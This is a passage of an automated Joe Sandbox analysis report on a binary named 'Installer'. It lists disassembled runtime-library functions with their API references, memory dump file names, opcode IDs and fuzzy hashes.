                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3716348337-0
                                                                                                                                                                                                                                                    • Opcode ID: 9a0af24da35fea3c6a4595b36f50a662205d8f92fd4dfb0b2c22ba3b0b3f5c3b
                                                                                                                                                                                                                                                    • Instruction ID: 83c6d5f233212dcb37e81cfdeece87b04f36d935983d024123c413e184ec365f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a0af24da35fea3c6a4595b36f50a662205d8f92fd4dfb0b2c22ba3b0b3f5c3b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601C0359101159FCB03EBA4C851ABEB7F5AF85324F154449F415AF382CF74AE40CB82
                                                                                                                                                                                                                                                    Function 0034ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0034ADDE
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0034ADE9
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0034AE57
                                                                                                                                                                                                                                                      • Part of subcall function 0034ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0034ACC2
                                                                                                                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 0034AE04
                                                                                                                                                                                                                                                    • _Yarn.LIBCPMT ref: 0034AE1A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088826258-0
                                                                                                                                                                                                                                                    • Opcode ID: 517605560d83d3d98971a67c9be9f49fd70871c3ce7b8fff54db95b9c48f5c61
                                                                                                                                                                                                                                                    • Instruction ID: b29d7a1bac269038ff5477155cc6e9caea13dcbfec2a1d49aa8f0a3df82f037d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 517605560d83d3d98971a67c9be9f49fd70871c3ce7b8fff54db95b9c48f5c61
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E401B175A40A609FCB07EB20D89157D77A5FF84750B054009E9155F381CF347E82CF82
                                                                                                                                                                                                                                                    Function 00360976 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00355BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00360A35
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00355BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00360A6C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                    • String ID: ,K7$utf8
                                                                                                                                                                                                                                                    • API String ID: 943130320-3027620799
                                                                                                                                                                                                                                                    • Opcode ID: 7057f9ce4658118f53fb5e62dfe706428c62179dc66358565548e30602049a9f
                                                                                                                                                                                                                                                    • Instruction ID: c0cd88bb7ff1007600d4696f1561263a77868e585bb3e41d1320a999012385cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7057f9ce4658118f53fb5e62dfe706428c62179dc66358565548e30602049a9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2651E531600705AADB2FAB71CC43FAB73A8EF05744F15C429F9499B189E6B0D9808765
                                                                                                                                                                                                                                                    Function 003473E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::_Release_chore.LIBCPMT ref: 00347526
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00347561
                                                                                                                                                                                                                                                      • Part of subcall function 0034AF37: CreateThreadpoolWork.KERNEL32(0034B060,00348A2A,00000000), ref: 0034AF46
                                                                                                                                                                                                                                                      • Part of subcall function 0034AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0034AF53
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: Fail to schedule the chore!$G.7
                                                                                                                                                                                                                                                    • API String ID: 3683891980-1612208290
                                                                                                                                                                                                                                                    • Opcode ID: c1e66bb9b3862f8732a94823aea22c425f4b415a6cf4230d8cf9a19f3cb18b95
                                                                                                                                                                                                                                                    • Instruction ID: 056a8f148b1f63c92e0514928a930f5c99aa6edca77681cee2ed8d76ffa40bc0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1e66bb9b3862f8732a94823aea22c425f4b415a6cf4230d8cf9a19f3cb18b95
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC519CB4D006089FCB16DF94D845BAEBBB4FF08314F144129E8196F391D779A905CF91
                                                                                                                                                                                                                                                    Function 00343E90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00343EC6
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00344002
                                                                                                                                                                                                                                                      • Part of subcall function 0034ABC5: _Yarn.LIBCPMT ref: 0034ABE5
                                                                                                                                                                                                                                                      • Part of subcall function 0034ABC5: _Yarn.LIBCPMT ref: 0034AC09
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name$|=4e.7
                                                                                                                                                                                                                                                    • API String ID: 2070049627-3792104845
                                                                                                                                                                                                                                                    • Opcode ID: 8e09588ceb900e904defb29fb5cceadcc01b98b95b6a8846ebf14835fc17076a
                                                                                                                                                                                                                                                    • Instruction ID: 2ba9a789b8662a8e77c03fe82fbecd0ec8d3ba9ce8eae77c3f224b508da4fe3d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e09588ceb900e904defb29fb5cceadcc01b98b95b6a8846ebf14835fc17076a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD417BF0A007459BEB21DF69C805B17BAF8BF04714F044629E8099B780E37AF518CBE2
                                                                                                                                                                                                                                                    Function 0034B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034B809
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: 3eb40265c8aaa33d8b3e23a23219dee5667495491bdde574b243586a1f46b578
                                                                                                                                                                                                                                                    • Instruction ID: 374655116d5518c8cb36017f723b649600ff578787a6511e6eab3d70465aaae2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3eb40265c8aaa33d8b3e23a23219dee5667495491bdde574b243586a1f46b578
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A721C235900645DFCF2A9FA4C855B6AF7ECEF44720F15491EE4528FA90DB34FA40CA81
                                                                                                                                                                                                                                                    Function 0034F11D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0034253A,?,?,00000000), ref: 0034F129
                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(?,00000000,?,?,0034253A,?,?,00000000), ref: 0034F142
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0034253A,?,?,00000000), ref: 0034F154
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                                                                                                                                                                    • String ID: :%4
                                                                                                                                                                                                                                                    • API String ID: 2551024706-536517894
                                                                                                                                                                                                                                                    • Opcode ID: d8fc0012224287f642e12f76df90227dd7af092b7e17a4e2324ffb6a1e26ceb9
                                                                                                                                                                                                                                                    • Instruction ID: 70fb550f3eebbadec9955b57b44badbee9eb634750623cca7413cc4fc69d874e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8fc0012224287f642e12f76df90227dd7af092b7e17a4e2324ffb6a1e26ceb9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF01971654515EFEF224F74DC06A593BA8EB01774F294320F925DA1F0D731EE41D640
                                                                                                                                                                                                                                                    Function 0034ABC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Yarn
                                                                                                                                                                                                                                                    • String ID: e.7$|=4e.7
                                                                                                                                                                                                                                                    • API String ID: 1767336200-2368979467
                                                                                                                                                                                                                                                    • Opcode ID: 7b452cb5f8d520daf717b14655729da7eabdee84d1d684a734047d1303c7cc24
                                                                                                                                                                                                                                                    • Instruction ID: 44f2447bf6be94e9143ad255e89d24792c4c1e7df186b6457336445f75e3abbc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b452cb5f8d520daf717b14655729da7eabdee84d1d684a734047d1303c7cc24
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EE03922348600ABEB5AAA65AC92FA633D8CB04B61F10402EF95ECE5D1ED10BC044655
                                                                                                                                                                                                                                                    Function 00366940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,003669DC,00000000,?,0037D2B0,?,?,?,00366913,00000004,InitializeCriticalSectionEx,00370D34,00370D3C), ref: 0036694D
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,003669DC,00000000,?,0037D2B0,?,?,?,00366913,00000004,InitializeCriticalSectionEx,00370D34,00370D3C,00000000,?,0035BBBC), ref: 00366957
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0036697F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: ab3efbee9ad8ceb15b24486c7ce8ec84107bda8e8e0899f93cdccbf66036687f
                                                                                                                                                                                                                                                    • Instruction ID: 2524c733d31c54e83a808d7849c54db12ab7032f6ec446441b202b169a8b1850
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab3efbee9ad8ceb15b24486c7ce8ec84107bda8e8e0899f93cdccbf66036687f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70E0E570394604BBEA321AA0EC07B697A99AB40B91F148824FE4DA84A5DB71A8909944
                                                                                                                                                                                                                                                    Function 00363F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(C82EE5EC,00000000,00000000,?), ref: 00364001
                                                                                                                                                                                                                                                      • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00364253
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00364299
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0036433C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                                                                                                                    • Opcode ID: 3fa22f765355732dbc876b83f4dfb168d492ebe96ae22b6654dba01a81c8bd8a
                                                                                                                                                                                                                                                    • Instruction ID: 30de5b26e917c8ba0e45ee205cf9d6c1bf888312123a05027bdebc4488c3a53b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fa22f765355732dbc876b83f4dfb168d492ebe96ae22b6654dba01a81c8bd8a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95D17975D002589FCF16CFE8D8809EDBBB9FF09314F28852AE956EB355D630A941CB60
                                                                                                                                                                                                                                                    Function 0035B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: ba16c21bdecc8d077bfff9e46f7eb1f3a0dc96b9a57fca0cf7a2ce88d94dcf7c
                                                                                                                                                                                                                                                    • Instruction ID: d248e9e7be1272d6a9ddbd816c5a671e496046bae4783e8e034321f0c9429c82
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba16c21bdecc8d077bfff9e46f7eb1f3a0dc96b9a57fca0cf7a2ce88d94dcf7c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E3796006059FDB2B9F50C882FAAF7A4EF04712F15452DEC466A2B1D731ED88CB90
                                                                                                                                                                                                                                                    Function 00347220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003472C5
